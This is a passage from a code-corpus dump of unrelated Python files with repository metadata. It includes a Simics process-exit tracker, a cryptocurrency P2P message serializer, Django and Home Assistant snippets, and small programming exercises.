self.killGroup(pid, exit_syscall) #exit_syscall.handleExit(pid, ida_msg, killed=True) else: self.rmTask(pid) if self.pageFaultGen is not None: self.pageFaultGen.handleExit(pid) self.clearExitBreaks() self.lgr.debug('contextManager deadParrot pid:%d rec no longer found removed task' % (pid)) if self.exit_callback is not None: self.exit_callback() def resetAlone(self, pid): self.lgr.debug('contextManager resetAlone') dead_rec = self.task_utils.getRecAddrForPid(pid) if dead_rec is not None: list_addr = self.task_utils.getTaskListPtr(dead_rec) if list_addr is not None: self.lgr.debug('contextMgr resetAlone rec 0x%x of pid %d still found though written by maybe not dead after all? new list_addr is 0x%x' % (dead_rec, pid, list_addr)) SIM_delete_breakpoint(self.task_rec_bp[pid]) del self.task_rec_bp[pid] SIM_hap_delete_callback_id("Core_Breakpoint_Memop", self.task_rec_hap[pid]) del self.task_rec_hap[pid] del self.task_rec_watch[pid] self.watchExit(rec=dead_rec, pid = pid) else: self.lgr.debug('contextMgr resetAlone rec 0x%x of pid %d EXCEPT new list_addr is None call deadParrot' % (dead_rec, pid)) self.deadParrot(pid) else: self.lgr.debug('contextMgr resetAlone pid %d no record for pid, call deadParrot' % (pid)) self.deadParrot(pid) if pid in self.demise_cache: self.demise_cache.remove(pid) def taskRecHap(self, pid, third, forth, memory): self.lgr.debug('taskRecHap pid %d' % pid) if pid not in self.task_rec_hap or pid in self.demise_cache: return dumb, comm, cur_pid = self.task_utils.curProc() self.lgr.debug('contextManager taskRecHap demise of pid:%d by the hand of cur_pid %d?' % (pid, cur_pid)) dead_rec = self.task_utils.getRecAddrForPid(pid) if dead_rec is not None: if pid != cur_pid: self.lgr.debug('contextManager taskRecHap got record 0x%x for %d, call resetAlone' % (dead_rec, pid)) self.demise_cache.append(pid) SIM_run_alone(self.resetAlone, pid) else: self.lgr.debug('Pid %d messing with its own task rec? Let it go.' % pid) else: value = SIM_get_mem_op_value_le(memory) self.lgr.debug('contextManager taskRecHap pid:%d wrote 0x%x to 0x%x watching for demise of %d' % (cur_pid, value, memory.logical_address, pid)) exit_syscall = self.top.getSyscall(self.cell_name, 'exit_group') if exit_syscall is not None and not self.watching_page_faults: ida_msg = 'pid:%d exit via kill?' % pid self.killGroup(pid, exit_syscall) #exit_syscall.handleExit(pid, ida_msg, killed=True) else: self.rmTask(pid) if self.exit_callback is not None: self.exit_callback() def setExitCallback(self, callback): self.exit_callback = callback def watchGroupExits(self): dumb, comm, cur_pid = self.task_utils.curProc() leader_pid = self.task_utils.getGroupLeaderPid(cur_pid) if leader_pid is None: self.lgr.error('contextManager watchGroupExits no group leader for %d' % cur_pid) self.lgr.debug('contextManager watchGroupExit cur_pid %d, leader %d' % (cur_pid, leader_pid)) pid_dict = self.task_utils.getGroupPids(leader_pid) for pid in pid_dict: self.watchExit(rec=pid_dict[pid], pid=pid) def watchExit(self, rec=None, pid=None): retval = True ''' set breakpoint on task record that points to this (or the given) pid ''' #self.lgr.debug('contextManager watchExit') dumb, comm, cur_pid = self.task_utils.curProc() if pid is None and cur_pid == 1: self.lgr.debug('watchExit for pid 1, ignore') return False if pid is None: pid = cur_pid rec = self.task_utils.getCurTaskRec() if rec is None: self.lgr.error('contextManager watchExit failed to get list_addr pid %d cur_pid %d ' % (pid, cur_pid)) return False list_addr = self.task_utils.getTaskListPtr(rec) if list_addr is None: ''' suspect the thread is in the kernel, e.g., on a syscall, and has not yet been formally scheduled, and thus has no place in the task list? OR all threads share the same next_ts pointer''' #self.lgr.debug('contextManager watchExit failed to get list_addr pid %d cur_pid %d rec 0x%x' % (pid, cur_pid, rec)) return False if pid not in self.task_rec_bp or self.task_rec_bp[pid] is None: watch_pid, watch_comm = self.task_utils.getPidCommFromNext(list_addr) if watch_pid in self.pid_cache: #cell = self.resim_context cell = self.default_context else: cell = self.default_context #cell = self.resim_context #self.lgr.debug('Watching next record of pid:%d (%s) for death of pid:%d' % (watch_pid, watch_comm, pid)) self.task_rec_bp[pid] = SIM_breakpoint(cell, Sim_Break_Linear, Sim_Access_Write, list_addr, self.mem_utils.WORD_SIZE, 0) #bp = self.genBreakpoint(cell, Sim_Break_Linear, Sim_Access_Write, list_addr, self.mem_utils.WORD_SIZE, 0) #self.lgr.debug('contextManager watchExit cur pid:%d set list break %d at 0x%x for pid %d context %s' % (cur_pid, self.task_rec_bp[pid], # list_addr, pid, str(cell))) #self.task_rec_hap[pid] = self.genHapIndex("Core_Breakpoint_Memop", self.taskRecHap, pid, bp) #self.lgr.debug('contextManager watchExit pid %d bp: %d' % (pid, self.task_rec_bp[pid])) self.task_rec_hap[pid] = SIM_hap_add_callback_index("Core_Breakpoint_Memop", self.taskRecHap, pid, self.task_rec_bp[pid]) self.task_rec_watch[pid] = list_addr else: #self.lgr.debug('contextManager watchExit, already watching for pid %d' % pid) pass return retval def auditExitBreaks(self): for pid in self.task_rec_watch: rec = self.task_utils.getRecAddrForPid(pid) if rec is None: self.lgr.debug('contextManager auditExitBreaks failed to get task record for pid %d' % pid) else: list_addr = self.task_utils.getTaskListPtr(rec) if list_addr is None: ''' suspect the thread is in the kernel, e.g., on a syscall, and has not yet been formally scheduled, and thus has no place in the task list? ''' self.lgr.debug('contextManager auditExitBreaks failed to get list_addr pid %d rec 0x%x' % (pid, rec)) elif self.task_rec_watch[pid] is None: watch_pid, watch_comm = self.task_utils.getPidCommFromNext(list_addr) self.lgr.debug('contextManager auditExitBreaks rec_watch for %d is None, but taskUtils reports %d' % (pid, watch_pid)) elif list_addr != self.task_rec_watch[pid]: watch_pid, watch_comm = self.task_utils.getPidCommFromNext(list_addr) prev_pid, prev_comm = self.task_utils.getPidCommFromNext(self.task_rec_watch[pid]) self.lgr.debug('contextManager auditExitBreaks changed in record watch for death of %d, was watching %d, now %d' % (pid, watch_pid, prev_pid)) def setExitBreaks(self): #self.lgr.debug('contextManager setExitBreaks') for pid in self.task_rec_bp: rec = self.task_utils.getRecAddrForPid(pid) self.watchExit(rec, pid) def clearExitBreaks(self): self.lgr.debug('contextManager clearExitBreaks') for pid in self.task_rec_bp: if self.task_rec_bp[pid] is not None: SIM_delete_breakpoint(self.task_rec_bp[pid]) self.task_rec_bp[pid] = None #self.lgr.debug('contextManager clearExitBreaks pid:%d' % pid) for pid in self.task_rec_hap: if self.task_rec_hap[pid] is not None: SIM_hap_delete_callback_id("Core_Breakpoint_Memop", self.task_rec_hap[pid]) self.task_rec_hap[pid] = None def resetBackStop(self): pass def getIdaMessage(self): return self.ida_message def getDebugPid(self): return self.debugging_pid, self.cpu def showIdaMessage(self): print 'genMonitor says: %s' % self.ida_message self.lgr.debug('genMonitor says: %s' % self.ida_message) def setIdaMessage(self, message): #self.lgr.debug('ida message set to %s' % message) self.ida_message = message def getRESimContext(self): return self.resim_context def getDefaultContext(self): return self.default_context def watchPageFaults(self, watching): self.watching_page_faults = watching def callMe(self, pageFaultGen): self.pageFaultGen = pageFaultGen
52fac62da61576ec22dc52af49eaae937130bdfd
9ec1242ae20b6f407f25a266456d83fb8a3d5f73
/src/nellCoin/lib/messages.py
dd5b6fb432476e6c8530ccf6e7483d3a9b8685ad
[ "LicenseRef-scancode-unknown-license-reference", "LicenseRef-scancode-public-domain", "MIT" ]
permissive
Nell-MDCoin/Nell-MDCoin
5b6d6af7e141844ba22970adacd4877d024e872b
9a1be366aba13539132dc7d0a9f0fdeaa2e19044
refs/heads/master
2020-03-21T23:17:23.329553
2018-06-29T17:32:53
2018-06-29T17:32:53
139,177,535
3
1
null
null
null
null
UTF-8
Python
false
false
9,907
py
# messages.py # # Distributed under the MIT/X11 software license from __future__ import absolute_import, division, print_function, unicode_literals import struct import time import random import cStringIO from nellCoin.lib.coredefs import * from nellCoin.lib.core import * MSG_TX = 1 MSG_BLOCK = 2 class msg_version(object): command = b"version" def __init__(self, protover=PROTO_VERSION): self.protover = MIN_PROTO_VERSION self.nVersion = protover self.nServices = 1 self.nTime = time.time() self.addrTo = CAddress(MIN_PROTO_VERSION) self.addrFrom = CAddress(MIN_PROTO_VERSION) self.nNonce = random.getrandbits(64) self.strSubVer = b'/python-bitcoin-0.0.1/' self.nStartingHeight = -1 def deserialize(self, f): self.nVersion = struct.unpack(b"<i", f.read(4))[0] if self.nVersion == 10300: self.nVersion = 300 self.nServices = struct.unpack(b"<Q", f.read(8))[0] self.nTime = struct.unpack(b"<q", f.read(8))[0] self.addrTo = CAddress(MIN_PROTO_VERSION) self.addrTo.deserialize(f) if self.nVersion >= 106: self.addrFrom = CAddress(MIN_PROTO_VERSION) self.addrFrom.deserialize(f) self.nNonce = struct.unpack(b"<Q", f.read(8))[0] self.strSubVer = deser_string(f) if self.nVersion >= 209: self.nStartingHeight = struct.unpack(b"<i", f.read(4))[0] else: self.nStartingHeight = None else: self.addrFrom = None self.nNonce = None self.strSubVer = None self.nStartingHeight = None def serialize(self): r = b"" r += struct.pack(b"<i", self.nVersion) r += struct.pack(b"<Q", self.nServices) r += struct.pack(b"<q", self.nTime) r += self.addrTo.serialize() r += self.addrFrom.serialize() r += struct.pack(b"<Q", self.nNonce) r += ser_string(self.strSubVer) r += struct.pack(b"<i", self.nStartingHeight) return r def __repr__(self): return "msg_version(nVersion=%i nServices=%i nTime=%s addrTo=%s addrFrom=%s nNonce=0x%016X strSubVer=%s nStartingHeight=%i)" % (self.nVersion, self.nServices, time.ctime(self.nTime), repr(self.addrTo), repr(self.addrFrom), self.nNonce, self.strSubVer, self.nStartingHeight) class msg_verack(object): command = b"verack" def __init__(self, protover=PROTO_VERSION): self.protover = protover def deserialize(self, f): pass def serialize(self): return b"" def __repr__(self): return "msg_verack()" class msg_addr(object): command = b"addr" def __init__(self, protover=PROTO_VERSION): self.protover = protover self.addrs = [] def deserialize(self, f): self.addrs = deser_vector(f, CAddress, self.protover) def serialize(self): return ser_vector(self.addrs) def __repr__(self): return "msg_addr(addrs=%s)" % (repr(self.addrs)) class msg_alert(object): command = b"alert" def __init__(self, protover=PROTO_VERSION): self.protover = protover self.alert = CAlert() def deserialize(self, f): self.alert = CAlert() self.alert.deserialize(f) def serialize(self): r = b"" r += self.alert.serialize() return r def __repr__(self): return "msg_alert(alert=%s)" % (repr(self.alert), ) class msg_inv(object): command = b"inv" def __init__(self, protover=PROTO_VERSION): self.protover = protover self.inv = [] def deserialize(self, f): self.inv = deser_vector(f, CInv) def serialize(self): return ser_vector(self.inv) def __repr__(self): return "msg_inv(inv=%s)" % (repr(self.inv)) class msg_getdata(object): command = b"getdata" def __init__(self, protover=PROTO_VERSION): self.protover = protover self.inv = [] def deserialize(self, f): self.inv = deser_vector(f, CInv) def serialize(self): return ser_vector(self.inv) def __repr__(self): return "msg_getdata(inv=%s)" % (repr(self.inv)) class msg_getblocks(object): command = b"getblocks" def __init__(self, protover=PROTO_VERSION): self.protover = protover self.locator = CBlockLocator() self.hashstop = 0 def deserialize(self, f): self.locator = CBlockLocator() self.locator.deserialize(f) self.hashstop = deser_uint256(f) def serialize(self): r = b"" r += self.locator.serialize() r += ser_uint256(self.hashstop) return r def __repr__(self): return "msg_getblocks(locator=%s hashstop=%064x)" % (repr(self.locator), self.hashstop) class msg_getheaders(object): command = b"getheaders" def __init__(self, protover=PROTO_VERSION): self.protover = protover self.locator = CBlockLocator() self.hashstop = 0 def deserialize(self, f): self.locator = CBlockLocator() self.locator.deserialize(f) self.hashstop = deser_uint256(f) def serialize(self): r = b"" r += self.locator.serialize() r += ser_uint256(self.hashstop) return r def __repr__(self): return "msg_getheaders(locator=%s hashstop=%064x)" % (repr(self.locator), self.hashstop) class msg_headers(object): command = b"headers" def __init__(self, protover=PROTO_VERSION): self.protover = protover self.headers = [] def deserialize(self, f): self.headers = deser_vector(f, CBlock) def serialize(self): return ser_vector(self.headers) def __repr__(self): return "msg_headers(headers=%s)" % (repr(self.headers)) class msg_tx(object): command = b"tx" def __init__(self, protover=PROTO_VERSION): self.protover = protover self.tx = CTransaction() def deserialize(self, f): self.tx.deserialize(f) def serialize(self): return self.tx.serialize() def __repr__(self): return "msg_tx(tx=%s)" % (repr(self.tx)) class msg_block(object): command = b"block" def __init__(self, protover=PROTO_VERSION): self.protover = protover self.block = CBlock() def deserialize(self, f): self.block.deserialize(f) def serialize(self): return self.block.serialize() def __repr__(self): return "msg_block(block=%s)" % (repr(self.block)) class msg_getaddr(object): command = b"getaddr" def __init__(self, protover=PROTO_VERSION): self.protover = protover def deserialize(self, f): pass def serialize(self): return b"" def __repr__(self): return "msg_getaddr()" #msg_checkorder #msg_submitorder #msg_reply class msg_ping(object): command = b"ping" def __init__(self, protover=PROTO_VERSION, nonce=0): self.protover = protover self.nonce = nonce def deserialize(self, f): if self.protover > BIP0031_VERSION: self.nonce = struct.unpack(b"<Q", f.read(8))[0] def serialize(self): r = b"" if self.protover > BIP0031_VERSION: r += struct.pack(b"<Q", self.nonce) return r def __repr__(self): return "msg_ping(0x%x)" % (self.nonce,) class msg_pong(object): command = b"pong" def __init__(self, protover=PROTO_VERSION, nonce=0): self.protover = protover self.nonce = nonce def deserialize(self, f): self.nonce = struct.unpack(b"<Q", f.read(8))[0] def serialize(self): r = b"" r += struct.pack(b"<Q", self.nonce) return r def __repr__(self): return "msg_pong(0x%x)" % (self.nonce,) class msg_mempool(object): command = b"mempool" def __init__(self, protover=PROTO_VERSION): self.protover = protover def deserialize(self, f): pass def serialize(self): return b"" def __repr__(self): return "msg_mempool()" messagemap = { "version": msg_version, "verack": msg_verack, "addr": msg_addr, "alert": msg_alert, "inv": msg_inv, "getdata": msg_getdata, "getblocks": msg_getblocks, "tx": msg_tx, "block": msg_block, "getaddr": msg_getaddr, "ping": msg_ping, "pong": msg_pong, "mempool": msg_mempool } def message_read(netmagic, f): try: recvbuf = f.read(4 + 12 + 4 + 4) except IOError: return None # check magic if len(recvbuf) < 4: return if recvbuf[:4] != netmagic.msg_start: raise ValueError("got garbage %s" % repr(recvbuf)) # check checksum if len(recvbuf) < 4 + 12 + 4 + 4: return # remaining header fields: command, msg length, checksum command = recvbuf[4:4+12].split(b"\x00", 1)[0] msglen = struct.unpack(b"<i", recvbuf[4+12:4+12+4])[0] checksum = recvbuf[4+12+4:4+12+4+4] # read message body try: recvbuf += f.read(msglen) except IOError: return None msg = recvbuf[4+12+4+4:4+12+4+4+msglen] th = hashlib.sha256(msg).digest() h = hashlib.sha256(th).digest() if checksum != h[:4]: raise ValueError("got bad checksum %s" % repr(recvbuf)) recvbuf = recvbuf[4+12+4+4+msglen:] if command in messagemap: f = cStringIO.StringIO(msg) t = messagemap[command]() t.deserialize(f) return t else: return None def message_to_str(netmagic, message): command = message.command data = message.serialize() tmsg = netmagic.msg_start tmsg += command tmsg += b"\x00" * (12 - len(command)) tmsg += struct.pack(b"<I", len(data)) # add checksum th = hashlib.sha256(data).digest() h = hashlib.sha256(th).digest() tmsg += h[:4] tmsg += data return tmsg
9d9c1305ed57e2a327da571c32f06702b2a1fc11
f0d713996eb095bcdc701f3fab0a8110b8541cbb
/Akx92Ldcy78xp5zCF_4.py
9d5e1d493ab24f7c6508ffe8f4080fda61583184
[]
no_license
daniel-reich/turbo-robot
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
a7a25c63097674c0a81675eed7e6b763785f1c41
refs/heads/main
2023-03-26T01:55:14.210264
2021-03-23T16:08:01
2021-03-23T16:08:01
350,773,815
0
0
null
null
null
null
UTF-8
Python
false
false
669
py
""" The function is given two strings `t` \- template, `s` \- to be sorted. Sort the characters in `s` such that if the character is present in `t` then it is sorted according to the order in `t` and other characters are sorted alphabetically after the ones found in `t`. ### Examples custom_sort("edc", "abcdefzyx") ➞ "edcabfxyz" custom_sort("fby", "abcdefzyx") ➞ "fbyacdexz" custom_sort("", "abcdefzyx") ➞ "abcdefxyz" custom_sort("", "") ➞ "" ### Notes The characters in `t` and `s` are all lower-case. """ def custom_sort(t, s): ​ return ''.join(sorted(list(s), key=lambda x: t.index(x) if x in t else ord(x) ))
dffb8f1d28234925bf2aa668f60bba767b675746
f1a5d89b17e3bf0f354546cc47c329a81f15dfc9
/apps/__init__.py
9827ad08f3307fbdc79dfbb87ce314af564b62c8
[]
no_license
lucassimon/civilizations
067193e17e7651a9fecb53f2b6e459c15ff4c97b
db8db27bb56ccda8c23059de88c60ef8d9670cb0
refs/heads/master
2020-03-29T13:16:01.025175
2018-12-29T18:22:45
2018-12-29T18:22:45
149,949,155
0
0
null
null
null
null
UTF-8
Python
false
false
499
py
# -*- coding: utf-8 -*- # Python Libs. from vibora import Vibora, Response # -*- coding: utf-8 -*- from vibora.hooks import Events from .config import config from .api import api def create_app(config_name): app = Vibora() @app.handle(Events.AFTER_ENDPOINT) async def before_response(response: Response): response.headers['x-my-custom-header'] = 'Hello :)' app.components.add(config[config_name]()) app.add_blueprint(api, prefixes={'v1': '/v1'}) return app
367d5083a97e5d006b5ed778da35518abfec3376
3f50e7f6894fc8eea825502b846dc0967493f7a4
/doc-src/objects/index.py
53bceb10edb9127c2df0acace412c55eba5bbc78
[ "MIT" ]
permissive
bavardage/qtile
92e62bc3195f3cfb0059afaa3dd008bd490caa6a
c384d354f00c8d025d0eff3e5e292303ad4b4e58
refs/heads/master
2021-01-16T00:49:34.141225
2009-03-26T16:54:51
2009-03-26T16:54:51
106,682
4
0
null
null
null
null
UTF-8
Python
false
false
235
py
from countershape.doc import * pages = [ Page("barsngaps.html", "Bars and Gaps"), Page("groups.html", "Groups"), Page("layouts.html", "Layouts"), Page("screens.html", "Screens"), Page("widgets.html", "Widgets"), ]
986d770ae16a5a17ea8ab21a9c8611ad9ec844f3
e62b1e748582584a5c2a05fff970fe09e72752b4
/app/migrations/0084_auto_20200312_2145.py
78c8618744d5f9bd75ef8f090009cc7f7e073750
[]
no_license
wlodekf/jpk
5957b515ecbcded9b4f27d6a0785ee89e3a0d585
1c200350f57469e890a124d07f741d836d9a0833
refs/heads/master
2023-07-10T20:15:11.111276
2021-08-11T12:21:14
2021-08-11T12:21:14
394,978,461
1
0
null
null
null
null
UTF-8
Python
false
false
645
py
# -*- coding: utf-8 -*- # Generated by Django 1.9.14.dev20170906233242 on 2020-03-12 21:45 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('app', '0083_auto_20200304_1321'), ] operations = [ migrations.AddField( model_name='plik', name='kod_systemowy', field=models.CharField(max_length=20, null=True), ), migrations.AddField( model_name='plik', name='wersja_schemy', field=models.CharField(max_length=5, null=True), ), ]
204aa6d13a66a0db1220d1ef9864c83c98c175d0
efd6a277c2d5bffdfba6ccb4d5efd555e652d29e
/chap7/7.7.py
7c207a1ed18a1835e5860abdacf3a292352aca05
[]
no_license
CavalcanteLucas/cookbook
dd57583c8b5271879bb086783c12795d1c0a7ee8
09ac71e291571e3add8d23d79b1684b356702a40
refs/heads/master
2020-03-25T03:09:39.608599
2019-09-13T04:43:23
2019-09-13T04:43:23
143,325,952
0
0
null
2020-09-25T05:46:30
2018-08-02T17:32:08
Python
UTF-8
Python
false
false
45
py
# Capturing Variable in Anonymous Functions
d4e579745fae8a47e60cc476411f97325d51b3fc
9a9e47d9cf1f663de411218a533c10bbf288cc9d
/config/wsgi.py
bc1f238dd14822d7df2fe5c0fdcf05f70c23e3ec
[ "MIT" ]
permissive
eyobofficial/Gebeya-Schedule-Bot
110f862a5e905c127e23ec0ad9bc9406f4180859
8c757fa8c26cf5dda6f917997c521d0f37b28aa9
refs/heads/development
2022-12-14T10:23:17.323365
2019-09-16T18:28:37
2019-09-16T18:28:37
204,556,349
3
2
MIT
2022-04-22T22:17:15
2019-08-26T20:31:16
Python
UTF-8
Python
false
false
442
py
""" WSGI config for config project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/ """ import os from decouple import config from django.core.wsgi import get_wsgi_application os.environ.setdefault( "DJANGO_SETTINGS_MODULE", config("DJANGO_SETTINGS_MODULE") ) application = get_wsgi_application()
fe67b587acb41838b627af66ca34a11ad458a34e
7aa4e4bfee6b0a265a4bcf1b7f81291f3299f43b
/Day17/quiz_brain.py
144287abfa11e8d10c95fbeb19d7332d51e1fc84
[]
no_license
fazer1929/100DaysOfCode_Python
464b54e33fdda25f985a4a7fde327ceafc88fa93
313cd77ad7266b18fd2442548569cf96f330ce26
refs/heads/main
2023-05-05T01:59:48.936964
2021-05-30T14:34:57
2021-05-30T14:34:57
311,775,381
0
0
null
null
null
null
UTF-8
Python
false
false
868
py
class QuizBrain: def __init__(self,qlist): self.question_list = qlist self.question_number = 0 self.score = 0 def nextQuestion(self): self.question_number += 1 question = self.question_list[self.question_number] ans = input(f"Q.{self.question_number}: {question.text} (True/False)? : ") self.checkAnswer(ans) def stillHasQuestion(self): return self.question_number < len(self.question_list) def checkAnswer(self,ans): if(ans.lower() == self.question_list[self.question_number].ans.lower()): print("You Got It Right!") self.score += 1 else: print("You Got It Wrong!!!") print(f"The Correct Answer Was {self.question_list[self.question_number].ans}") print(f"Your Current Score is {self.score}/{self.question_number}")
466bd43facef0ff807850dc4caf2a5d061758411
72af42076bac692f9a42e0a914913e031738cc55
/01, 특강_210705_0706/02, source/CookData(2021.01.15)/Code03-02.py
77bba4c75ad3200137cbc7e4f6f9c010afb45baa
[]
no_license
goareum93/Algorithm
f0ab0ee7926f89802d851c2a80f98cba08116f6c
ec68f2526b1ea2904891b929a7bbc74139a6402e
refs/heads/master
2023-07-01T07:17:16.987779
2021-08-05T14:52:51
2021-08-05T14:52:51
376,908,264
0
0
null
null
null
null
UTF-8
Python
false
false
536
py
katok = ["다현", "정연", "쯔위", "사나", "지효"] def insert_data(position, friend) : if position < 0 or position > len(katok) : print("데이터를 삽입할 범위를 벗어났습니다.") return katok.append(None) # 빈칸 추가 kLen = len(katok) # 배열의 현재 크기 for i in range(kLen-1, position, -1) : katok[i] = katok[i-1] katok[i-1] = None katok[position] = friend # 지정한 위치에 친구 추가 insert_data(2, '솔라') print(katok) insert_data(6, '문별') print(katok)
65f9cfdb3e2d22893d9a562025b9bd322fc2b5d5
ca8fe12def17494b4fd8a97664d7d9fcb1f9121f
/notifier.py
5541ce560a39a17898c3957aad22a6fb585f744f
[]
no_license
pondelion/PassiveHealthMonitor
0d52c71bc8b8aa327680ef7585bd24a608bd4385
4072c4c161a0d4d1c7e86931edb70b4c076e96e4
refs/heads/main
2023-04-25T16:06:12.784931
2021-05-15T03:49:35
2021-05-15T03:49:35
null
0
0
null
null
null
null
UTF-8
Python
false
false
514
py
from abc import ABCMeta, abstractmethod from overrides import overrides class Notifier(metaclass=ABCMeta): @abstractmethod def notify( self, monitoring_target: str, notified_cpunt: int ) -> None: raise NotImplementedError class MockNotifier(Notifier): @overrides def notify( self, monitoring_target: str, notified_cpunt: int ) -> None: print(f'{monitoring_target} : {notified_cpunt}') DefaultNotifier = MockNotifier
f7721c25cf493ef1ded4213a2d67b41a3474dcfc
14b5679d88afa782dc5d6b35878ab043089a060a
/students/贾帅杰/home0529/hachina5.py
36d8ba5bc9fbfdee8285432c97c1d565fbda2281
[]
no_license
mutiangua/EIS2020
c541ef32623f67f9277945cd39cff3c02f06e4dd
92aa2711b763a2c93be238825c445bf2db8da391
refs/heads/master
2022-11-18T05:21:47.567342
2020-07-11T10:11:21
2020-07-11T10:11:21
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,617
py
# 引入datetime库用于方便时间相关计算 from datetime import timedelta import logging import voluptuous as vol # 引入HomeAssitant中定义的一些类与函数 # track_time_interval是监听时间变化事件的一个函数 from homeassistant.helpers.event import track_time_interval import homeassistant.helpers.config_validation as cv DOMAIN = "hachina5" ENTITYID = DOMAIN + ".hello_world" CONF_STEP = "step" DEFAULT_STEP = 3 #f=open("C:\\Users\\23004\\AppData\\Roaming\\.homeassistant\\custom_components\\num.txt", "r") # 定义时间间隔为3秒钟 TIME_BETWEEN_UPDATES = timedelta(seconds=1) _LOGGER = logging.getLogger(__name__) CONFIG_SCHEMA = vol.Schema( { DOMAIN: vol.Schema( { # 一个配置参数“step”,只能是正整数,缺省值为3 vol.Optional(CONF_STEP, default=DEFAULT_STEP): cv.positive_int, }), }, extra=vol.ALLOW_EXTRA) def setup(hass, config): """配置文件加载后,setup被系统调用.""" conf = config[DOMAIN] step = conf.get(CONF_STEP) _LOGGER.info("Get the configuration %s=%d", CONF_STEP, step) attr = {"icon": "mdi:yin-yang", "friendly_name": "Door", "slogon": "积木构建智慧空间!", "unit_of_measurement": ""} # 构建类GrowingState GrowingState(hass, step, attr) return True class GrowingState(object): """定义一个类,此类中存储了状态与属性值,并定时更新状态.""" def __init__(self, hass, step, attr): """GrwoingState类的初始化函数,参数为hass、step和attr.""" # 定义类中的一些数据 self._hass = hass self._step = step self._attr = attr self._state = 0 # 在类初始化的时候,设置初始状态 self._hass.states.set(ENTITYID, self._state, attributes=self._attr) # 每隔一段时间,更新一下实体的状态 track_time_interval(self._hass, self.update, TIME_BETWEEN_UPDATES) def update(self, now): f=open("C:\Apache24\htdocs\\index.html", "r") data = f.read() # 读取文件 #datas=data[-4:] """在GrowingState类中定义函数update,更新状态.""" _LOGGER.info("GrowingState is "+data) # 状态值每次增加step self._state = self._state + self._step # 设置新的状态值 self._hass.states.set(ENTITYID, data, attributes=self._attr)
7023ccfa04ae9db5e41aa1991b5c1bdc4d513f2a
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p02948/s243741324.py
2cffaa3be99d436febcc3c638d3fc41cc448b571
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
491
py
from heapq import heappop,heappush,heapify from collections import deque N,M=map(int,input().split()) A,B,C = [0]*N,[0]*N,[0]*N for i in range(N): A[i],B[i] = map(int,input().split()) C[i]=[A[i],B[i]] C.sort() C=deque(C) a=[] heapify(a) ans=0 for i in range(M,-1,-1): while C: if C[0][0]<=M-i: heappush(a,(-1)*C[0][1]) C.popleft() else: break if len(a)>0: p = heappop(a) ans += (-1)*p print(ans)
4749a3c0908091555e12a2d95d89a42aa01f83f6
b1571f4ee376d789b8094777fd81c4fb47a89cf1
/AtCoder/練習/Beginners Selection/ABC087B.py
23846c48ce3cc1eb755514d5511a6d7951002ae6
[]
no_license
hiroyaonoe/Competitive-programming
e49e43f8853602ba73e658cab423bd91ebbe9286
2949e10eec3a38498bedb57ea41a2491916bab1c
refs/heads/master
2021-06-23T21:56:33.232931
2021-05-30T15:27:31
2021-05-30T15:27:31
225,863,783
2
0
null
2020-06-14T17:54:28
2019-12-04T12:37:24
Python
UTF-8
Python
false
false
595
py
a=int(input()) b=int(input()) c=int(input()) x=int(input()) cnt=0 for i in range(a+1): for j in range(b+1): for k in range(c+1): if x == 500*i+100*j+50*k:cnt+=1 print(cnt) ''' coinA=min(a,x//500) coinB=min(b,(x-coinA*500)//100) coinC=min(c,(x-coinB*100)//50) cnt=0 changeB=coinB changeC=coinC if 500*coinA+100*coinB+50*coinC>=x: while coinA>=0: while 0<=changeB<=b: if 0<=changeC<=c: cnt+=1 changeB-=1 changeC+=2 changeB=coinB changeC=coinC coinA-=1 changeB+=5 print(cnt) '''
c23dd5e12ae719e7b4616d5f20ac6bbd59a2fadb
4073f351551c2f73c5659cb3038a68360cc5b369
/Lärobok/kap 6/kap. 6, sid. 76 - sätta ihop strängar.py
a6ec6841d16836e6f2de9f964e810fd69f375383
[ "MIT" ]
permissive
Pharou/programmering1python
b9a5aca72354d3e7e91a5023a621d22a962ecd7c
9b689027db1f7fbf06925f3094fcb126880453e4
refs/heads/master
2022-11-28T06:33:17.295157
2020-07-25T11:02:07
2020-07-25T11:02:07
null
0
0
null
null
null
null
UTF-8
Python
false
false
572
py
#!/usr/bin/python3.8 # Filnamn: kap. 6, sid. 76 - sätta ihop strängar.py # Programmering 1 med Python - Lärobok # Kapitel 6 - Mer om teckensträngar i Python # Med plustecken kan du slå samman flera strängar till en enda. # Det kallas även konkatenering av strängar fn = 'Tage' ln = 'Test' name = fn + ln print(name) # Som du ser så skrivs inget mellanslag ut i den första print-satsen, # det måste du manuellt lägga in själv name = fn + ' ' + ln print(name) # Upprepning av strängar görs med multiplikationstecknet * print(3 * 'Hola!') print(15 * '-')
91c53302d52e9d5a99a4e0d0b685179371931b6d
cc08f8eb47ef92839ba1cc0d04a7f6be6c06bd45
/Personal/Jaypur/Jaypur/settings.py
76bd9d7c357d60980068b2b15d2475f763bef64f
[]
no_license
ProsenjitKumar/PycharmProjects
d90d0e7c2f4adc84e861c12a3fcb9174f15cde17
285692394581441ce7b706afa3b7af9e995f1c55
refs/heads/master
2022-12-13T01:09:55.408985
2019-05-08T02:21:47
2019-05-08T02:21:47
181,052,978
1
1
null
2022-12-08T02:31:17
2019-04-12T17:21:59
null
UTF-8
Python
false
false
3,158
py
